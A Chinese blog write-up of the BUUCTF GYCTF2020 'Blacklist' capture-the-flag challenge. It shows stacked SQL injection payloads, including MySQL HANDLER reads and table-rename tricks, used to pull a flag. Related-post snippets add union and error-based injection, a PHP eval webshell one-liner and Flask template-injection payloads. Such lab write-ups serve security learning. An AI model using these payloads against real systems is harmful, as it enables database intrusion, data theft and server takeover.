BUUCTF [web专项31][GYCTF2020]Blacklist

最新推荐文章于 2024-10-15 10:20:47 发布

yanglin_371

最新推荐文章于 2024-10-15 10:20:47 发布

阅读量68

点赞数

文章标签： web安全网络安全

本文链接：https://blog.csdn.net/yanglinchiji/article/details/134260479

版权

坏了，好熟悉的感觉，好像之前做过类似的题目，甚至大致模板都一样

找到了:BUUCTF [web专题7] [强网杯 2019]随便注-CSDN博客

我记得是用堆叠注入来获取库表之类的

而且只能获取1，2的数据，其他数据(数字，字符等)全都不显示好像

查库

1';show databases;

再爆表

1';show tables;#

出来了，进入FlagHere

1';desc FlagHere;#

flag就在这里

我记得原本我总结了两种方法，一种是用handler获取flag，另一种是替换words的数据来进行输出获取flag

第一种：handler

1';handler FlagHere open as a;handler a read next;#

出现flag

第二种：顶替words来输出数据

1';rename table words to test;rename table FlagHere to words;alter table words add id int unsigned;alter table words change flag data varchar(100);#

ok了，rename，alter被过滤掉了，第二种方法不行，还是用handler吧

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

yanglin_371

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[GYCTF2020]Blacklist 1（详细做题过程）

lunan的博客

05-24

2652

[GYCTF2020]Blacklist 1（详细做题过程）文章目录[GYCTF2020]Blacklist 1（详细做题过程）1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通，看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法心得：学会新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4

[GYCTF2020]Blacklist 1+[GXYCTF2019]BabySQli 1

bazzza的博客

12-23

311

blacklist 拿到题先试下能不能注入 ?inject=1%27%20or%201=1%20--%20q 存在注入，接着使用order by判断字段，发现字段数为2，但在接一步的注入中，出现提示，遇到阻拦。这个地方使用正则过滤了一些关键字，在尝试绕过的时候也失败了，但是他这个地方没有过滤 ; 和extractxml(),可以先报错注入拿到库名，然后再进行堆叠注入，(直接用show database()会分不清是哪个表) 报错注入报当前库名 ?inject=1%27%20and%20extract

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF WEB blacklist1

qq_41696858的博客

10-27

172

之前做过这题，就当是复习了堆叠注入得到数据库名，表名，列名 -1';show databases;# //得到库名 -1';show tables;# //得到表名 -1';show columns from FlagHere;#//得到列名下面就是主要点，select被过滤了，这题考的就是这个的过滤思路，三种思路，可以看我之前的文章 https://blog.csdn.net/qq_41696858/article/details/119513224 但是buuctf的靶场和攻防世界的还不一样，攻防

BUUCTF WEB [GYCTF2020]Blacklist

Y1da的博客

04-18

273

BUUCTF WEB [GYCTF2020]Blacklist 提交1'，报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 发现注入点尝试union注入 /?inject=1' union select 1,2

gyctf_2020_some_thing_interesting

qq_62887641的博客

08-29

246

show一般用来泄露libc，极个别用来改got表然后getshell，（或者还有其他。edit这里正常edit，有的师傅有用edit，直接改fd指针，效果一样的。add这里，建了两个chunk，size都是fastbin大小的。本题已经拿到libc了所以没啥用(-.-)这里存在一个格式化字符串漏洞，刚好够。然后读入的东西会进入到下面这里。有了libcbase下面随便打。题目部署在libc-2.23。但是他检测只检测写入的前。我们看看栈能泄露点啥东西。必须含有这个，这里占了。uaf+格式化字符串。

[GYCTF2020]EasyThinking

m0_63045593的博客

04-20

672

www.zip下有源码 thinkphp漏洞登录时会有session 1234567890123456789012345678.php 可以修改注意是32位有搜索功能 <?php @eval($_POST['123']);?> 搜索的结果会存在/runtime/session/下getshell/runtime/session/sess_1234567890123456789012345678.php 蚁剑链接根目录下有readflag但是ban了好多之前的题在这个用不了但是.

[GYCTF 2020] Web复现 wp

Alexhirchi的博客

07-30

1717

FlaskApp 要点：模板注入、Pin码访问网站，提示了该网站由Flask框架搭建，进行简单测试，提供了base64加密和解密的功能，并开启了flask的dubug功能(输入错误的base64解码会出现报错界面) 猜测存在模板注入，构造payload:{{2+6}} base64加密，将结果进行解码，验证存在模板注入构造payload获取python文件内容（通过之前的报错可以知道python文件名），循环查找catch_warnings,打开app.py读取内容 {% for c in []

BUUCTF之[GYCTF2020]Blacklist--------堆叠查询

weixin_44632787的博客

06-19

717

BUUCTF之[GYCTF2020]Blacklist--------堆叠查询启动挑战项目，发现前端界面显示Black list is so weak for you,isn’t it 又是一道用堆叠查询的题目，看来CTF也很喜欢考这类型的题目呀！首先爆出数据库：1’;show databases; 然后爆出表名：1’; show tables; 然后显示某个表里面列的信息：1’;show columns from FlagHere; 接下来的才是重点，在MYSQL数据库中：可以用handl

BUUCTF-WEB-[GYCTF2020]Blacklist

r1727337824的博客

08-29

827

BUUCTF-WEB

ccfly1012的博客

11-02

3896

目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页，查看一下源代

WEB-buuctf-black list

weixin_52804141的博客

01-01

172

buuctf black list

第六十二题——[GYCTF2020]FlaskApp

分享简单的安全技术

05-10

396

题目地址：https://buuoj.cn/challenges 解题思路第一步：进入题目，base64加密页面，题目给出flask提示，猜测使用模板注入第二步：构建漏洞在加密页面将{{7+7}}进行base64加密后，将密文使用解密页面解码，发现执行了7+7算法，确定了存在模板注入漏洞。第三步：获取flag 使用{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %

Buuctf之Web(四)

qq_50589021的博客

11-22

1639

[HFCTF2020]JustEscape WP vm2沙盒逃逸涉及到nodejs不会 [网鼎杯2018]Unfinish 脚本 # -*- coding: utf-8 -*- # @Author : Yn8rt # @Time : 2021/9/10 14:38 #coding:utf-8 import requests from bs4 import BeautifulSoup import time url = 'http://f8933a3b-5f22-4bde-bde9-7a49c4b

GYCTF2020_Writeup

Lethe's Blog

03-15

2655

[GYCTF2020] web题-Blacklist

BROTHERYY的博客

07-24

547

复现环境：buuoj.cn 打开题目发现过滤了一些关键字发现跟强网杯的随便注一样，可以使用堆叠注入。可以看到有FlagHere和words这两个表，过滤了一些关键字这里使用mysql特有的查询-handler 通过handler table_name open打开一张表，在这里声明一个名为table_name的句柄。通过handler table_name read first获取句柄的第一行，通过read next依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。详细的

[GYCTF2020] web题-Ezsqli

BROTHERYY的博客

12-30

449

这题一直出问题，用脚本跑到一半都会崩。后面换了一个，能够跑出来。详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>

BUUCTF [GYCTF2020] Blacklist

Senimo

12-08

1446

BUUCTF [GYCTF2020] Blacklist 启动靶机：提交参数1后正常回显内容：

入门网络安全工程师要学习哪些内容

白帽子佳奇的博客

10-10

985

大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对还是不了解，不知道需要学什么?知了堂小编总结出以下要点。是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和不一样，如果你想成为安全开发工程师，学的侧重点就和安全不一样。学的东西很泛，但选定方向就简单了。大致的学习流程总结就是：网络基础、操作系统、中间件、数据库。其中电脑基础：像系统Windows基础和Linux基础、HTML基础、代码JS基础等。

如何用3个月零基础入门网络安全？_网络安全零基础怎么学习